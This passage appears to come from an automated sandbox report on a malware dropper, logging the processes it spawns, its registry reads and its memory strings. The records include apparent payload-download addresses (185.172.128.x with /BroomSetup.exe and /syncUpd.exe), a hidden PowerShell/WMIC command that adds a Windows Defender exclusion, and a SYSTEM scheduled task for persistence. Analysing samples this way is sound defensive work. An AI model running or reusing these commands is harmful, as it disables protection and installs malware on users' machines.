                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: 185.172.128.22821_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: /BroomSetup.exe21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: /BroomSetup.exe21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: 185.172.128.22821_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: /BroomSetup.exe21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: @21_2_041E4DA5
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: one21_2_041E4DA5
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: one21_2_041E4DA5
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: two21_2_041E4DA5
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: two21_2_041E4DA5
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: five21_2_041E4DA5
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: five21_2_041E4DA5
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: seven21_2_041E4DA5
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: seven21_2_041E4DA5
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: eight21_2_041E4DA5
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: eight21_2_041E4DA5
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: nine21_2_041E4DA5
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: nine21_2_041E4DA5
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: ten21_2_041E4DA5
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: ten21_2_041E4DA5
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: 185.172.128.9021_2_041E4DA5
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: 185.172.128.9021_2_041E4DA5
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: 185.172.128.9021_2_041E4DA5
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: Installed21_2_041E4DA5
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: Installed21_2_041E4DA5
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: 185.172.128.22821_2_041E4DA5
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: 185.172.128.22821_2_041E4DA5
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: 185.172.128.22821_2_041E4DA5
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: 185.172.128.5921_2_041E4DA5
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: 185.172.128.5921_2_041E4DA5
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: /syncUpd.exe21_2_041E4DA5
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: /syncUpd.exe21_2_041E4DA5
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: 185.172.128.5921_2_041E4DA5
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: /syncUpd.exe21_2_041E4DA5
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: /1/Qg_Appv5.exe21_2_041E4DA5
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: /1/Qg_Appv5.exe21_2_041E4DA5
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: /1/Qg_Appv5.exe21_2_041E4DA5
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: Qg_Appv5.exe21_2_041E4DA5
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: Qg_Appv5.exe21_2_041E4DA5
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: 185.172.128.22821_2_041E4DA5
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: 185.172.128.22821_2_041E4DA5
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: /BroomSetup.exe21_2_041E4DA5
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: /BroomSetup.exe21_2_041E4DA5
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: 185.172.128.22821_2_041E4DA5
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: /BroomSetup.exe21_2_041E4DA5
                        Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                        Source: C:\Users\user\AppData\Local\Temp\u69w.1.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                        Source: C:\Users\user\AppData\Local\Temp\u69w.1.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                        Source: file.exeStatic file information: TRID: Win64 Executable Console Net Framework (206006/5) 48.58%
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1374404248.00000000023C0000.00000004.00001000.00020000.00000000.sdmp, wr6XLbv7Ijp4TImjm1ouF4U2.exe, 0000001E.00000002.1881705606.0000000140001000.00000040.00000001.01000000.00000015.sdmpBinary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1374404248.00000000023C0000.00000004.00001000.00020000.00000000.sdmp, wr6XLbv7Ijp4TImjm1ouF4U2.exe, 0000001E.00000002.1881705606.0000000140001000.00000040.00000001.01000000.00000015.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1405006585.0000000002A57000.00000004.00000020.00020000.00000000.sdmp, u5v8.0.exe, 0000000A.00000003.1545346922.000000002471E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: file.exeReversingLabs: Detection: 57%
                        Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe "C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe "C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe"
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetSvcs -p -s NcaSvc
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe "C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe"
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeProcess created: C:\Users\user\AppData\Local\Temp\u5v8.0.exe "C:\Users\user\AppData\Local\Temp\u5v8.0.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe "C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe"
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exe .\Install.exe /nxdidQZJ "385118" /S
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                        Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe "C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe"
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeProcess created: C:\Users\user\AppData\Local\Temp\u69w.0.exe "C:\Users\user\AppData\Local\Temp\u69w.0.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe "C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe"
                        Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ECVVQonpjDvaVVq8u9A57jpg.bat" "
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeProcess created: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe "C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe"
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 21:38:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exe\" em /VNsite_idnLd 385118 /S" /V1 /F
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\H6XhhPCeuwAb2QQK3C3B1Lwl.exe "C:\Users\user\AppData\Local\H6XhhPCeuwAb2QQK3C3B1Lwl.exe"
                        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\l0nXYBHJHVq6UHyy1YDO9fn3.exe "C:\Users\user\Pictures\l0nXYBHJHVq6UHyy1YDO9fn3.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\wr6XLbv7Ijp4TImjm1ouF4U2.exe "C:\Users\user\Pictures\wr6XLbv7Ijp4TImjm1ouF4U2.exe"
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeProcess created: C:\Users\user\AppData\Local\Temp\u4dc.0.exe "C:\Users\user\AppData\Local\Temp\u4dc.0.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\PA8JWMmRYiQsN7iqTjOvjsbW.exe "C:\Users\user\Pictures\PA8JWMmRYiQsN7iqTjOvjsbW.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\zUOgRazdYnb35XHU4UIsV9Yc.exe "C:\Users\user\Pictures\zUOgRazdYnb35XHU4UIsV9Yc.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\6dpl9L7LbyabhVQNXZXXKjGL.exe "C:\Users\user\Pictures\6dpl9L7LbyabhVQNXZXXKjGL.exe"
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeProcess created: C:\Users\user\AppData\Local\Temp\u69w.1.exe "C:\Users\user\AppData\Local\Temp\u69w.1.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\0FR80IiNvxJZyXnpOgiDlYNV.exe "C:\Users\user\Pictures\0FR80IiNvxJZyXnpOgiDlYNV.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exe C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exe em /VNsite_idnLd 385118 /S
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\68bEfZA6FBu6lC5BaADYSIdx.exe "C:\Users\user\Pictures\68bEfZA6FBu6lC5BaADYSIdx.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\ikL90ODaFTS7N6FbOffM2D1B.exe "C:\Users\user\Pictures\ikL90ODaFTS7N6FbOffM2D1B.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\ka1rT1Ln7XhH1aQSgOeo3013.exe "C:\Users\user\Pictures\ka1rT1Ln7XhH1aQSgOeo3013.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\G3pV8gTsWQBVrGpK4ooPrlxI.exe "C:\Users\user\Pictures\G3pV8gTsWQBVrGpK4ooPrlxI.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exe "C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exe" --silent --allusers=0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\OYqxk9G3x4R05N4I0KLZXbXg.exe "C:\Users\user\Pictures\OYqxk9G3x4R05N4I0KLZXbXg.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exe "C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exe" --silent --allusers=0
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeProcess created: C:\Users\user\Documents\SimpleAdobe\UWxz0MPLJemfxFfuxrp6E5vU.exe C:\Users\user\Documents\SimpleAdobe\UWxz0MPLJemfxFfuxrp6E5vU.exe
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeProcess created: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exe C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exe
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe "C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe" Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe "C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe" Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe "C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe" Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe "C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe" Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\l0nXYBHJHVq6UHyy1YDO9fn3.exe "C:\Users\user\Pictures\l0nXYBHJHVq6UHyy1YDO9fn3.exe" Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\wr6XLbv7Ijp4TImjm1ouF4U2.exe "C:\Users\user\Pictures\wr6XLbv7Ijp4TImjm1ouF4U2.exe" Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\PA8JWMmRYiQsN7iqTjOvjsbW.exe "C:\Users\user\Pictures\PA8JWMmRYiQsN7iqTjOvjsbW.exe" Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\zUOgRazdYnb35XHU4UIsV9Yc.exe "C:\Users\user\Pictures\zUOgRazdYnb35XHU4UIsV9Yc.exe" Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\6dpl9L7LbyabhVQNXZXXKjGL.exe "C:\Users\user\Pictures\6dpl9L7LbyabhVQNXZXXKjGL.exe" Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\0FR80IiNvxJZyXnpOgiDlYNV.exe "C:\Users\user\Pictures\0FR80IiNvxJZyXnpOgiDlYNV.exe" Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\68bEfZA6FBu6lC5BaADYSIdx.exe "C:\Users\user\Pictures\68bEfZA6FBu6lC5BaADYSIdx.exe" Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\ikL90ODaFTS7N6FbOffM2D1B.exe "C:\Users\user\Pictures\ikL90ODaFTS7N6FbOffM2D1B.exe" Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\ka1rT1Ln7XhH1aQSgOeo3013.exe "C:\Users\user\Pictures\ka1rT1Ln7XhH1aQSgOeo3013.exe" Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\G3pV8gTsWQBVrGpK4ooPrlxI.exe "C:\Users\user\Pictures\G3pV8gTsWQBVrGpK4ooPrlxI.exe" Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exe "C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exe" --silent --allusers=0Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\OYqxk9G3x4R05N4I0KLZXbXg.exe "C:\Users\user\Pictures\OYqxk9G3x4R05N4I0KLZXbXg.exe" Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exe "C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exe" --silent --allusers=0Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeProcess created: C:\Users\user\AppData\Local\Temp\u5v8.0.exe "C:\Users\user\AppData\Local\Temp\u5v8.0.exe" Jump to behavior
